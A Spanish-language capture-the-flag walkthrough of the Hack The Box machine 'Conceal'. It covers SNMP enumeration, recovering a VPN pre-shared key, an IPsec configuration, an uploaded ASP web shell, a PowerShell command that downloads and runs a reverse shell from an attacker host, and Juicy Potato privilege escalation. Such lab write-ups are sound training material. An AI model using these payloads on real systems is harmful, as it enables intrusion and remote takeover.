Giter VIP home page Giter VIP logo

conceal-htb's Introduction

Conceal-HTB

Nmap

Esta maquina no permite que de una escanees lo puertos tcp por lo que tuve que usar UDP y ahi si.

Vemos el puerto 161 UDP de SNMP intentamos usar el snmpwalk

snmpwalk -v 2c -c public 10.10.10.116

Encontramos lo que parece ser un password

VPN password PSK - 9C8B1A372B1878851BE2C097031B6E43"

image

IKE - UDP 500

Nos tenemos que conectar via IPSEC.

UDP 500 is used for Internet Key Exchange (IKE), which is used to establish an IPSEC VPN. There is some recon I can do on the IKE using ike-scan:

ike-scan -M 10.10.10.116

En base a lo que dice hacktricks podemos ver que tipo de conexion tiene. El problema de esto es la configuracion.

sudo apt install strongswan

Para configurar tienes que tocar estos archivos y pues existen vaias maneras de hacer esto pero esta fue la que ami me funciono /etc/ipsec.conf:

# ipsec.conf - strongSwan IPsec configuration file

config setup
    charondebug="all"
    uniqueids=yes
    strictcrlpolicy=no

conn conceal
    authby=secret
    auto=add
    ike=3des-sha1-modp1024!
    esp=3des-sha1!
    type=transport
    keyexchange=ikev1
    left=10.10.14.15
    right=10.10.10.116
    rightsubnet=10.10.10.116[tcp]

Y ahora tocamos ipsec.secrets

# This file holds shared secrets or RSA private keys for authentication.

%any : PSK "Dudecake1!"

Despues te conectas con

 ipsec up conceal

Si no ajala intenta reinciar la conexion

 ipsec restart

image

Ya conectados tenemos acceso a todos los puertos.

image

IIS server

image

Tenemos el folder upload ahi subimos el shell.asp

<%response.write CreateObject("WScript.Shell").Exec(Request.QueryString("cmd")).StdOut.Readall()%>

Y pues con la shell reverse...

http://10.129.228.122/upload/shell.asp?cmd=powershell%20iex(new-object%20net.webclient).downloadstring(%27http://10.10.15.72/shell.ps1%27)

Podemos usar el Juicy potato

image

conceal-htb's People

Contributors

gecr07 avatar

Watchers

avatar

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    ๐Ÿ–– Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. ๐Ÿ“Š๐Ÿ“ˆ๐ŸŽ‰

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google โค๏ธ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.